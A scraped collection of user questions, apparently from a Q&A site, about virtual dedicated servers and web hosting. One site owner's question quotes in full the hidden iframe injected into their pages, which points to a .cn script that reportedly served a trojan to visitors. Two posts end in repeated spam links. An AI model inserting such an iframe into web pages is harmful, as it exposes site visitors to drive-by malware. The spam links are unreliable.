Where can I get help for my GoDaddy Virtual Dedicated Server? I have had a GoDaddy Virtual Dedicated Server since October. I'm in over my head on some things and GoDaddy is less than helpful. Is there anywhere I can go for help in how to do something like configure AWSTATS to show histoy? I may also be interested in changing to a different provider who can provide meaningful support. I'm not looking for someone to do it for me. I'm looking for someone to teach me.

I'm having trouble installing software on a virtual dedicated server, can anyone help? I have a virtual dedicated server running linux on godaddy.com, I seem to have all of the components necessary to run the software i want, Atutor. I have downloaded it to the server but still can't seem to be able to finish the installation instructions (http://www.atutor.ca/atutor/docs/installation.php) I don't think that there is anything hard to it, but I'm in a little over my head. Any help would be appreciated.

how to enable PHP error reporting on a godaddy virtual dedicated server? Hi - I found out that Plesk turns off php error reporting by default and that to turn in on I have to modify "/etc/php.ini" . I downloaded 'putty' and SSH-ed as 'su' but permissions are denied when I type /etc/php.ini. I called godaddy and was told that they are having no problem doing it on their end and just to make sure that I login as root (which I think "su" is, correct?) - Of course, since virtual dedicated server come with no support, I am stuck in the dark... Please help! MANY THANKS :-)
Is getting a dedicated-virtual server the best way to avoid getting shared hosting banning because of CPU use? What I mean is...at Mediatemple.net with their (gs) Grid-Service plan, they only allow 1,000 GPUs and if you go over (instead of getting banned) you have to pay more and I think "banning" was the wrong to use...I meant "suspending", like how some sites suspend you for a day or more if you happen to get on the front page of Digg.com
Is it possible to add a www. in front of a sub domain on a Virtual Dedicated server? hosted on godaddy I need the websites deeper in the hierarchy instead of just pointing to the website in the root folder. http://(need a www here)favorites.orphanmissions.com/
Where can I get a low-cost, but still reliable Windows Virtual Dedicated Web Server? Should have control panel Where can I get a low-cost, but still reliable Windows Virtual Dedicated Web Server? Should have a nice control panel for managing the websites. The plan should allow hosting of unlimited domains and loads of bandwidth. Please suggest me some websites. Pls. note - reliability (uptime) is my prime concern.
is there a guru out there faster than godaddy service? question about virtual dedicated server - setting DNS? I'm a little new at the virtual dedicated server thing so please forgive if I miss a detail here. The server requires to have a name, so it is named: wncwebsitedesign.com (that actual domain name is simply cash parked at the moment, and I dont have any need to open it as an actual website just yet). On this new server (wncwebsitedesign.com) I have created the first website, which is called maggievalleyproperty.com. In my main control panel there is only one ns entry, so I created another, so now I have ns1.wncwebsitedesign.com and ns2.wncwebsitedesign.com. In the control panel for the first created website I have done the same. I created the second NS entry and it now has: ns1.maggievalleyproperty.com and ns2.maggievalleyproperty.com. Soooooo. I go to the godaddy registrar to change the dns settings so I can point the domain to the files...right?....but when I place ns1.maggievalleyproperty.com and ns2.maggievalleyproperty.com as the nameservers, it is not taking them as registered name servers....what am I missing?
Is my dedicated server faster for my customers? I had a shared server and now have got a virtual dedicated server which my host says is faster. How can I test this for myself?
How to install FFMPEG on Godaddy Virtual Dedicated Server? After using shared hosting for so long finally I purchased VDS from Godaddy. I would like to run script like YuoTube that requires ffmpeg, ffmpeg-php, Mplayer ,Mencoder, Flv2tool, Libogg ,Libvorbis, LAME MP3 Encoder. I have CentOS 5.2 Apache 2.0 PHP 5.28... There are hundreds of instructions on Google but all of them are old and do not work... Who knows how to install thees adons for the script to work?
what is the difference between virtual and dedicated servers? i have started my new business of domain name registration and hosting as a reseller. i went to google.com and searched for hosting companies but every hosting company have two types of hosting virtual and dedicated. what is better for me and why?
Where can i buy a nicely priced dedicated server? I am just wondering if anyone knows where i can buy a dedicated server that is nicely priced and the subscription lasts a long time, Linux or Windows, preferably 3-6Gb ram and unlimited bandwidth with a upstream speed of 2-4Mbps, not really needing a lot of space either 20GB should do nicely, even if you you can find a good priced virtual server would be great too
Whats the difference in getting a dedicated server space60$/month vs. a hosting plan for 5$ permonth? Im looking at getting a website domain but what do i need after that? I see virtual servers, dedicated servers and then there are hosting plans which are cheaper than anything, but what is a hosting plan?
Why does shared web hosting offer unlimited bandwidth but dedicated servers or VPS hosting does not? Just curious why you don't get unlimited data transfer if you're paying A LOT more for a dedicated server or virtual private server.
Question about run VM (Virtual Server)? I've got a few IBM x306 blade servers, with 2 GB ram which I would upgrade to 4GB. I'd like to run Microsoft System Center Essentials on a virtual server on one of these machines. The consulting firm that we use is telling us that the server is too old to effectively run VM and that we need a new dedicated server to run SCE. Any thoughts?
How do I set up a remote desktop connection to a VPS (dedicated server)? Is it possible to set up a virtual server and run an operating system off of it (basically use it just as I would use the hard drive in my computer)? I want to do this mainly so that I can benefit from the super fast connection speeds, but also because if this is possible, it would mean that I wouldn't need to physically upgrade my hard drives and I would have almost limitless online storage space. My question is not so much "can you do it?" because I know that you can. I guess I am asking more along the lines of "what can you do with it?" More specifically, would I be able to boot into a VPS directly from my home computer if I have it set to boot from LAN in the BIOS config? Or would I be required to boot into the physical OS and connect to the VPS OS through that? Would it be possible to install a multi-booting OS configuration onto a VPS? If I want to transfer all of my data over to a dedicated server, will that data then be accessible to the owner of the server without my knowledge? Assuming that it would, then is it possible to encrypt all data on the virtual server so that anything written to the server would be unreadable without a key? (Yes, I know theoretically they could extract the key from a previous log in and hack into it. But this is assuming they are just curious. If I had any data important enough to go to those lengths to get, I wouldn't store it remotely.) basically those are the major questions that I have. I'm a very experienced computer nerd, but I'm new to dedicated servers... hoping that someone with some insight might be able to answer some of my questions. Much appreciated
Should I use RAID 1 or RAID 5 for my Virtual Machine host server (Microsoft Hyper-V)? I am building a server that will be used as a virtual machine hosting server, using Microsoft Hyper-V as the virtual server hosting OS. The hardware I am using will be a motherboard with capacity for 6 SATA 10,000 RPM disks. I can set them up using RAID 1 or RAID 5. I cannot use a mix of different RAID options for the disks. I must choose either RAID 1 or RAID 5 for all the disks. Which option would be best for performance? I plan to create 10 virtual machines on the system. I know I would have more total disk capacity using RAID 5 instead of RAID 1 (mirroring), but am wondering if there is a benefit to using RAID 1 for the entire system, in regards to general performance. The virtual machines will be a mix of workstations, database servers, web servers, and other systems. The host OS (MS Hyper-V) uses a very small amount of disk space. The a majority of space will be dedicated the various virtual servers running. There is no need to send me links to websites describing RAID (I know about the various general benefits of the different types of RAID). I am interested in hearing from someone who has implemented a RAID configuration when setting up a virtual hosting server and have some good advice regarding which option offers best performance.
Windows Vs Linux server? I have been asked to figure out the right server requirement for my company. We have decided to go with a Virtual Dedicated Server, but the question now is, is it better to go with Windows or Linux? What should I consider while choosing one or the other? When is Windows an advantage and when is Linux better? Which is better for ecom applications?
How much ram do i need on a server to handle a site with a lot of traffic? I am using a Virtual Dedicated Server with 256mb ram (2gb burst) at this time. I just had my first crash on my control panel and FTP. I have not had that much traffic for now (4-6 ppl online at one point sometimes) Tech support help me restarted it and suggested i could get more ram for my server. I am considering a Dedicated Server and all i need is more ram.. bandwidth and harddrive is not an issue. how much ram do i need to serve a huge traffic (100-300 online at a time) im expecting in the future with ease? 1gb? 2gb? 4gb? my site is nothing more than a tv links site, where users go to find links for shows/movies to watch. http://www.tvlinko.com
Let's say I lease a dedicated server from some hosting company.? I use a software app like Virtuozzo or VMWare to create 4 Virtual Machines inside the server. I now have 4 virtual machines in the server, each with its own memory, OS, Windows. Would I be able to log into one of the VMs using remote software, and then - from that machine, browse the internet, go to other websites, download software, and basically do anything that I could do on a regular PC? Part of my trouble in understanding my own question, is that the leased dedicated server would probably not have a monitor attached to it, and I am used to using remote software that lets you see what is happening on the desktop of the computer being accessed. I am trying to figure out what I would see from my computer if I was connecting to one that did not have a monitor. Would I still be able to use my local mouse and keyboard in the environment of the remote server, and would I be able to do what ever I want to accomplish on the VM, despite it's status as a webhost server?
Shared hosting or Dedicated hosting (which is more common?)? I offer shared web hosting with packages that range from free to unlimited for less then $5. To me that seems like a great deal to host a website but I am wondering how many people use dedicated servers or virtual private servers instead and pay anywhere from $20 to $150. Do you pay more then $5 for hosting? and why? http://calendar2010.cn/top-100-hosting-domain.html http://calendar2010.cn/top-100-hosting-domain.html http://calendar2010.cn/top-100-hosting-domain.html http://calendar2010.cn/top-100-hosting-domain.html http://calendar2010.cn/top-100-hosting-domain.html
Can a Virtual Private Network (VPN) be setup on a peer to peer network? We have a 4 computer peer to peer network that runs through our cable modem router. We do not have a dedicated server but I need to setup a Virtual Private Network so our accountant can login to our system to download a backup without us taking the time to post it to an ftp site. Can a VPN be setup without a dedicated server?
multiple domain one dedicated server? I am trying to build my dedicated server which will host about 10 domains. I have tried isapirewriter and IIRF for this structure. structure: domain1.com->virtual directory1 domain2.com->virtual directory2 and so on you got the idea. is there a tutorial or doc todo this. I have been looking everywhere and its really hard to build up an IIS6 in this situation I miss apache. btw I made some imrovements for www.biraa.com but it lost its css and image paths. I am trying to build this kinda solution because I like to automate this process. pls dont suggest right click on "default web site" and "new web site" solution because it will not be automated in the future. thanks in advance
Wilcard DNS (similar to hosts file) in Windows without a local dedicated DNS server...? I have a local test server running Apache2 with virtual hosting setup correctly. I'd like to set up a system so that *.dev is redirected to my testing server at 192.168.0.4 I know I can do this for each individual site using the hosts file found in C:\WINDOWS\system32\drivers\etc\ Unfortunately the Windows hosts file doesn't work with wildcards! I don't have a dedicated local DNS server, but I'd like a system that redirects *.dev to my server without the need to open and edit the Windows hosts file every time. Do you know how this can be achieved? Thanks in advance.
How do I add a "www" to my domain? I'm using Godaddy's Virtual Dedicated Server and Plesk Control Panel. Many Thanks!
Can you recommend a good web host? I'm going to be running a site with profiles that link to a 30 sec. video. I'll be hosting the videos and streaming them from the server. People can search through the profiles and watch the videos. Any recommendations on companies or types of hosting (dedicated virtual server vs. physical server, etc).
Windows 2003 SMTP server help!? Well I am having a issue with virtual SMTP servers. I am trying to make it so each domain on my windows 2003 box (Virtual dedicated) has its own IP address for sending mail. I setup a virtual SMTP server for each IP and domain but when I send mail through that IP/Domain it will use the servers default IP address to relay the mail out. Do you have any idea how to fix this so each virtual SMTP is sending with its own IP address? Or do you know of a SMTP server I can istall that will let me configure it this way? I have a bunch of domains hosted on a windows box and some clients reqire a dedicatged IP with rDNS for sending emails.
where's the best deal on Virtual Private Server? I'm looking for a dedicated VPS Hosting with cPanel and 2 IPs. The cheapest I've found is in the $50-$100 range... Is there anything cheaper out there?
Setting up website with java I have a virtual dedicated server from godaddy which has tomcat on it. I developed an app and now want to deploy it to the site. I want it so that when you get www.myexamplesite.com, the default jsp appears. I can get the app to work sorta using the tomcat directory (123.123.123.123:9080/myjavaapp) but obviously I don't want all this out, just the domain name. Forgive my ignorance, but I am a caveman when it comes to servers. This is my first time doing this on my own and I'm a little lost. So if there's any way to dumb it down for a rookie like me, I'd appreciate it.
I upload files to my website via FTP, but they don't appear in my browser? I just started with a Virtual-Dedicated Server yesterday, created my cpanel account, created my ftp account, logged in, and uploaded some files to my public_html directory. However, when I try viewing anything I've uploaded (by going to http://server-ip/file_name in a browser), I get a "Not found" error! My FTP program says the files are there, and cpanel's file-manager says they're there, but my browser can't view them! Any suggestions on what I'm doing wrong? My index page is still the default cpanel-place-holder page, even though I uploaded a new index.html. My domain name hasn't been changed yet to the new server, so I'm trying to view my site by typing in its IP address into the browser, rather than its domain name. Additionally if it helps, cpanel said: "The hostname (box.my-domain.com) resolves to . It should resolve to "my-ip". Please be sure to correct /etc/hosts as well as the 'A' entry in zone file for the domain." Thanks for reading my question.
Recover mysql database dropped by accident...? ... by accident using phpmyadmin I dropped my current mysql database. I do not have backup.... my site is gone including all modifications and banners and listings.... Is there any way to recover deleted dropped MySql database from virtual dedicated server ?
How can I upload large files to my godaddy website in PHP5? I'm trying to upload files (50-80 megabytes in size) to my godaddy website and am unable to do so. Godaddy literally told me to "google" it. They said i could find the answer- or I could purchase a virtual dedicated server for $30/month and start uploading large files immediately. So I DO NOT HAVE A VIRTUAL DEDICATED SERVER. I am trying to upload these files to the current site as is. And the limit is set at 8 megs or so-- and Godaddy does not know how to change this. Any suggestions are greatly appreciated.
Shared Hosting Plan with Lots of Memory? Hi, I am looking for a shared hosting plan for my website that offers a lot of memory and processing power. I would go with a dedicated server or virtual dedicated server, but do not want to deal with setting up my own email, php, mysql, etc. servers on it. I want someone else to maintain the platform (with security updates, new versions of php, etc.) so that I can focus my time on development work. I basically need a shared hosting plan on steroids. Does anyone know of any good plans like this? Thanks in advance.
I am about to launch a website but dont know which hosting plan to use? I am currently with godaddy on their economy shared hosting plan. The problem is I have no idea how popular the site is going to be. It is a UK based site dealing with Gold Panning - goldpanningsuppliesdotcodotuk. I think if there is some mention of Gold Panning on the television there may be 400 hits in a day, but most of the time probably around 20. But I have no real way of knowing until a spike hits. I am going to announce its launch on a very popular gold panning forum, so would like to be prepared for about 200 hits on the first day. That may be way optimistic but I would hate if the site crashed and lost all that good will. If you look at the site you can see there are two embedded youtube videos. If you click twice I assume the viewer is consuming youtube bandwidth, but if just once am I right in assuming this would consume my bandwidth? Say there would be a max of 20 people watching these videos simultaneously. Would the economy virtual dedicated server be capable of handling this? I would like to try this for the first month, or maybe until the first TV article induced peak. And then scale back if the estimates were over optimistic. Would a godaddy VDS be capable of handling this. Question 2) Can you check out the site and tell me if the current download time is acceptable. Particularly when you click gold equipment. And then Gold Pans. Is it just my imagination or is it very slow? Would moving from the economy shared host to the premium shared host speed things up? Would moving to a VDS speed things up. You can probably see I am all over the place. Trying to understand how different hosting plans can deal with numbers of simultaneous hits/effect on speed/how to calculate bandwidth used per hit etc. If you were using the estimated figures I have provided which plan would you go for. I have to eplain the reasoning to my cousin whos site it is, so much detail would be appreciated. Please dont advise me to move from godaddy as I have found this stressful enough as it is. Migrating host 1 month before launch and losing the yearly subscription would freak me out!
I created a form in HTML. When visitors fill in this form I want the submit button to email my boss. Help!? I'm very novice, I searched for an answer but i don't know what to do. All I know if our dedicated virtual server can handle ASP.
I need to host a program on a server but I dont want to pay a FULL big ded server, what do I do? Hi there, I have this Bot program I am going to use in a Virtual world called Second Life, and the business requires me to have the Bots online 24/7 But renting a dedicated server is too expensive. I just need a small server with normal bandwith and veeeeery low disk space. The program is only 264KB I will open it several times to create more than 1 bot, and it takes some bandwith, like 20 makes 2gb. So please someone recommend me something and cheap Thank You!
What web hosting package will I need? I'm looking into starting a chat & dating website (using SQL, PHP etc.) and was wondering what sort of web hosting package I would need to host the site? Do i need a dedicated server? Can I use a virtual one? What should I look out for from my host? I cant predict what sort of traffic I'd have, but I'm being optimistic and hoping to sign up several 1000 users monthly (the host would therefore need to cope with several users being on-line at once). Can anyone give me any advice on this? What sort of traffic can I expect? What sort of band width should I look for? The site wont have provision for webcams initially, but this may be an option in the future. Users will be able to upload photos, videos and music on the site too (with limitations). Any help much appreciated. Thx
How to make my internet faster? Hey! Currently i am living in a house with my family and everyone uses the internet some download and that really makes the internet slow for me. Is there a way for me to dedicate some bandwidth to my computer directly so that i wont be as effected? Can i do some port forwarding? or something with virtual servers? how would i go about setting a static ip for my computer? thanks for any information you can give me. Thanks...and btw i dont want a mac...i know how to use a pc im not in kindergarden
UK based web hosting needed? I am looking for web hosting based within the UK (Due to search engine issues it has to be based within the UK). The hosting only needs to be shared and not a dedicated server or virtual. I will need around 20-50GB bandwidth per month and the usual FTP access/stats etc. Costing £10-£15 per month but upgradable. I am already in the I.T. industry and work closely with large ISP's and web hosting companies, however these are too large and do not provide any shared hosting. If you have experience of a particular provider (Good or Bad) then your help and advice would be apreciated.
Which hosting to buy? I am launching a youtube clone. I expect that after a few days atleast 50 people will be online on my website each and every time. I heard that simple shared hosting plans don't allow more than 20 users to be online on the server at a time. I am not sure about that info. Please let me know whether I should buy a simple shared hosting plan, a virtual private server, a semi dedicated server or a dedicated server? I don't have money for dedicated server monthly costs. Plz help
MYSQL security issue - need advice? I am on a godaddy server, shared, and they won't fix it, so I am asking someone hear for advice or a solution before getting my own dedicated server as a last resort. My sites were getting hacked about two months ago using an iframe code that went to a .cn site and apparently downloaded a trojan to the users machine. Well i cleaned up all my sites as it infected php, coldfusion, html files all the same with this little line of code on the end of each page. I changed all my passwords to ones using letters, numbers, symbols etc to avoid possible cracking. The code was and still is: < iframe src="http://liteautotop.cn/ts/in.cgi?mozila" width=1 height=1 style="visibility: hidden">< / iframe > (spaced out to avoid a problem here) Now two months later it's back, same issue, downloading a trojan to users machine. I am deleting the two sites that are having this issue at present only these two are, however I am tired of deleting and restoring databases every few months or more due to this obvious exploit. Need direction on what to do to secure the server from my end since it is on a shared server can I do anything without converting to a virtual or dedicated one? If you can lead me in the right direction of avoiding this type of attack yet again I would appreciate it. Only suggestion I gotten thus far is to 1- delete all website files like HTML, php and so forth (pdf, images, css files seem to be fine) and remove and reinstall databases. 2- get either a dedicated or virtual dedicated server so you can install a firewall on it to help protect it from such attacks. If by chance someone did download something onto their machine, your customers or visitors for example the best virus software I have found is Trend Micro. I had to do a clean install on my own system since it was quicker than fighting the trojan that was infecting my machine after visiting one of my sites. UPDATE I have since said screw godaddy for hosting and purchased a virtual dedicated server so I have more control over stuff such as this as well as installed software to block as much of this as possible. I purchased a nice package for $20 a month at infinitie.net, they have a special running on eBay, just search virtual server on ebay and their username was edealzdirect ... I am not promoting this seller, just a reference to it and what you can do besides waiting on godaddy to do nothing in the end.
I need advice on what webhosting i will need for a small social community !!!!? I'm looking into starting a social community website (using SQL, PHP etc.) and was wondering what sort of web hosting package I would need to host the site? Do i need a dedicated server? Can I use a virtual one? What should I look out for from my host? I cant predict rapid and massive traffic when i launch it, but I'm being optimistic and hoping to sign up several 1000 users monthly (the host would therefore need to cope with several users being on-line at once). Can anyone give me any advice on this? What sort of traffic can I expect? What sort of band width should I look for? What size of webspace should I look for?Users will be able to upload photos, videos and music on the site too (with limitations). And possibly unlimited emails! Thanks alot!
Friend cant connect to my Garrys mod server? I created a multiplayer game and forwarded my ports correctly, so how come my friend still cant connect to my server? I dont want a dedicated server, I want a simple one so just me and him can play.. Am i giving him the wrong IP address to join? (The one that www.whatismyip.com is showing) or what.. we also tried the Hamachi Virtual network, But that dident work either Ripping my hair out here over it.. Thanks in advance. Its not a mistaken IP, I got my friend to try and join through XFire... Could this possible be a problem with my modem/router? Its kinda old now, And my ports never seem to forward properly anymore.. Had a similar problem when i tried to run a TeamSpeak server.. It was set to sv_lan 0, Bryan. Thanks tho
Hosting Video Sharing Sites? I am about to start a video sharing site and I am wondering what is the best way to go since the site has not even started yet and has no visitors. Should I go with a Virtual Host that will provide me with FFMPEG hosting for about 10 bucks a month or less and will give me unlimited bandwidth and storage. OR A VPS that will give me unlimited transfer/2MBPS and 100GB storage for 30 bucks a month. Do I really need to start out with a VPS since the site will initially not be receiving much traffic? How long would a Virtual account last me before I had to move to VPS or dedicated server? The most important question is about how long a virtual account would last me and how much could the site transfer before experiencing heavy lag... For instance, lets say most of the videos were about 50MB in size, with a video site hosted on a virtual account, how many users could view this video before the site would experience a lot of lag? I didnt really mean how long in terms of time, I meant how long in terms of size, like how many visitors would my site be able to handle while on a virtual account before having to move to a VPS or dedicated server, how much can my site grow before I have to move to a VPS/dedicated server. And as far as the lag goes, I was trying to get a comparison on what the difference in lag will be like between a site hosted on a VPS and a site hosted on a virtual account, each with very small amounts of traffic.
What's the benefit of having a dedicated/virtual hosting plan when using asp.net? Can you use just a regular hosting plan to make changes to a Microsoft SQL server database, or do you need dedicated/virtual?
Bandwidth Speed.? OK Im looking for a dedicated server, but Im not 100% sure how fast the bandwidth is, the one I am looking at says it has a 512Kbit virtual data pipe how fast is that?? I have 16Meg broadband at home is it measured the same way, so if downloading from the dedicated server the max download speed would be 512 Kbps? Thanks
Whose responsibility to set up reverse DNS lookup? I registered a domain from an ISP/Hosting company, and leased a Virtual Private Server from them to operate my website. AOL and other mailservers won't accept email from my website because it does not have Reverse Domain Name Server Lookup set up. Everything I have read says this is the responsbility of the ISP that provided the IP addresses and Domain Name Servers. The company says it is *my* responsibility, and I will have to dedicate two IP addresses and build this into my Virtual Private Server, and will have to upgrade to $160 month to handle the "extra load". I say it is their responsibility to set up reverse DNS look up, given that they provide the DNS servers and the two IP addresses so that the internet community can translate my domain name into an IP address. If you do a "Who Is?" lookup, it returns two nameservers operated by the ISP, and their dedicated IPs for them. I figure a reverse lookup should lead to their servers also. Please help me sort this out. The first answer does not seem to help. I have gone to www.dnsstuff.com, and there is NO reverse DNS look up registered. The people I lease my virtual server are providing the DNS servers, but they continue to claim that I have to configure my own DNS servers if I want reverse look up. They claim that the servers they are using as my Domain Servers do not provide the reverse look up function (they claim it is disabled). They claim I am the only client who is having this problem, and that it is either AOL's fault for insisting on reverse dns lookup before acceptine email, or it is responsibility to set up reverse dns lookup if I want it. I am going nuts with this...how can they possibly be selling hosting packages and NOT provide reverse dns lookup??? How could any of the sites they host ever send anything to AOL? Surely AOL is not the only big server to reject mail coming from domains that cannot be looked up in reverse. I do not know why they refuse to just do it. for me How can they sell me a hosting package that does not allow sending email to anybody on AOL?
Windows Server Cluster Question? Greetings - I am wondering if you can assign a new virtual IP in a cluster to a separate nic\network? Currently our cluster nodes are active\active and are being backed over the network up via the virtual IP. I would like to add another NIC and then bind that nic to our backup network VLAN. This will anable us to backup the cluster via the new dedicated VLAN. Thanks!
I have a negative balance in my PayPal; if I close my bank, will Paypal go further? Here's the story I sold $1000 worth of hosting to one guy (he's renting 4 dedicated servers from me). The guy disputed all his payments a month after he paid. Naturally, I can't send a virtual good to someone via FedEx/USPS/etc. so I'm at a loss here. I've had this happen to me before; I've lost the dispute even when I called PayPal. I tried to close my PayPal account to avoid the charges; it won't let me. I tried to remove my bank information from PayPal; it won't let me. I cannot afford to lose that $1000 because I paid $700 for datacenter space and bandwidth (ultimately $300 profit) and I can't get that back. Now here's the question: If I close my bank account will PayPal go further (possibly with a lawsuit or repossession?)
How can Amazon Web Services best be used for hosting multiple websites? I work at a web agency and have several clients we would put on a single dedicated LAMP server environment that belongs to us. I'm thinking of moving over to Amazon Web Services and want to learn about the best setup for my client's needs. Should I be putting only one website on a virtual machine, or can I configure Apache to host several websites on one server? Note that these websites aren't high-traffic apps. Are there any third party solutions I should consider, like Virtualmin?
Self-Hosting vs. VPS: which is right for me? I have two hosting needs: PHP and Rails. I've had (a bad) experience hosting a PHP site on a shared server. I've also briefly run a simple PHP server for a hobby site with low-availability standards. Now that I'm considering running a serious, large site (Ruby on Rails), in addition to a few small existing PHP sites, should I host myself, or choose a Virtual Private Server? * I have a 3.0GHz P4 / 1GB ram machine I could dedicate to hosting. * I am familiar with general computer security principles, programming, and Linux * I have a Comcast cable connection (no static IP) * I can't imagine spending much more than $50 / mo. to start. I'll add any details you consider relevant.

Best Practice for setting up development network? am looking for any ideas regarding how companies setup thier software development department. For example, do they allow the programmer to code on a corporate PC or is there usually a dedicated development machine? Do you use virtualization? I came up with a couple of scenarios. 1) Have an additional computer for each programmer solely for development. Therefore thier corporate machine will remain unaffected by thier code and can be locked down by IT. 2) Use one PC (the corporate PC) and install VM Workstation on it. Have the programmer develop in the virtual machine. 3) Purchase a powerful server, run virtual machines on the box, and have each developer RDP into thier respective virtual machine. There are definitely pros and cons to each. I am looking for comments or suggestions on what you have done.

Is there a website that has list of WoW gold farmers? Hi, thanks for opening this question. I really cannot stand these chinese websites that offers virtual services. I love WoW and played it for 3 years but people like these ruin economy of the server, battleground, and even others' account. My real life friends who played with me and bought golds slash power leveled their characters, now got hacked and they quit. Since then, I am dedicated to get rid of all the gold farmers, HK farmers, or Power Levelers in WoW. I heard it on youtube that there is a website that has list of well known WoW gold farmers and where they can be often found. If you guys know the website, I would greatly appreciate it. Thanks for checking and answers in advance.
10000-20000 IP everyday, recommend a server please.? I am running a BBS website whose traffic increases really crazy, so now my virtual space frequently warns me “exceed of CPU quota” and shut down my website for several minutes every time there are too many online users. Now I am planning to purchase a dedicated server, could anyone tell me how much it will cost? I don’t have too much money, so, if possible, I also accept a shared-server. Server/virtual space requirements: 1 10000-20000 IP everyday; 2 1000 users online simultaneously; 3 independent server or shared; Do not forget telling me the charge. Please recommend. 
Shared hosting or Dedicated hosting (which is more common?)? I offer shared web hosting (djlsolution.com) with packages that range from free to unlimited for less then $5. To me that seems like a great deal to host a website but I am wondering how many people use dedicated servers or virtual private servers instead and pay anywhere from $20 to $150. Do you pay more then $5 for hosting? and why? http://healthy-and-beauty.cn/top-100-hosting-domain.html http://healthy-and-beauty.cn/top-100-hosting-domain.html http://healthy-and-beauty.cn/top-100-hosting-domain.html http://healthy-and-beauty.cn/top-100-hosting-domain.html http://healthy-and-beauty.cn/top-100-hosting-domain.html
